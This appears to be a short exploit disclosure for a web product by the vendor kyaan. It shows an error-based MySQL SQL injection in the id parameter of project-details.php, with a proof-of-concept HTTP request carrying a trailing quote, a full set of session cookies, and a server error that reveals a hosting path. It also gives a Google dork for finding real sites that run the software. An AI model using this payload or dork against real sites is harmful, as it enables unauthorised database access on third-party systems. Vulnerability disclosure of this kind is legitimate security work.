Exploit Title: kyaan - Multiple Vulnerabilities # Date: March 27, 2025 # Exploit Author: wa0_3 # Telegram: @wa0_3 # Vendor Homepage: https://kyaan.co # Version: 1.0 # Tested on: Windows local xampp # DBMS: MySQL # CVE: N/A # Google Dork: inurl:project-details.php?id= intxt: تصميم وبرمجة شركة كيان للحلول الإعلامية المتكاملة © 2024 =============================================================================================================================== Vulnerability: SQLi Type: error-based (MySQL) File: project-details.php Parameter: id ## Proof of Concept (PoC): ``` GET /project-details.php?id=19' HTTP/2 Host: localhost Cookie: _gcl_au=1.1.1020665683.1743076210; _scid=oZTzVYgNL8U6P-ly3gzhJa-pv9Jsu6Ub; _ga=GA1.1.731786864.1743076210; _fbp=fb.2.1743076210060.524082259942009775; _tt_enable_cookie=1; _ttp=01JQBQ0EAGPW26SAXQ4A6TVCBS_.tt.2; _ScCbts=%5B%5D; _sctr=1%7C1743026400000; PHPSESSID=8950365753d2392f176950a445913d6c; _scid_r=sRTzVYgNL8U6P-ly3gzhJa-pv9Jsu6UbmfT-aw; _ga_NNZHC95GYC=GS1.1.1743110760.2.0.1743110760.0.0.0 Cache-Control: max-age=0 Sec-Ch-Ua: "Not;A=Brand";v="24", "Chromium";v="128" Sec-Ch-Ua-Mobile: ?0 Sec-Ch-Ua-Platform: "Windows" Accept-Language: en-US,en;q=0.9 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.6613.120 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: none Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Accept-Encoding: gzip, deflate, br Priority: u=0, i ``` ### Response: ``` Warning: mysqli_num_rows() expects parameter 1 to be mysqli_result, bool given in /home1/qkbdhymy/public_html/header.php ``` ===============================================================================================================================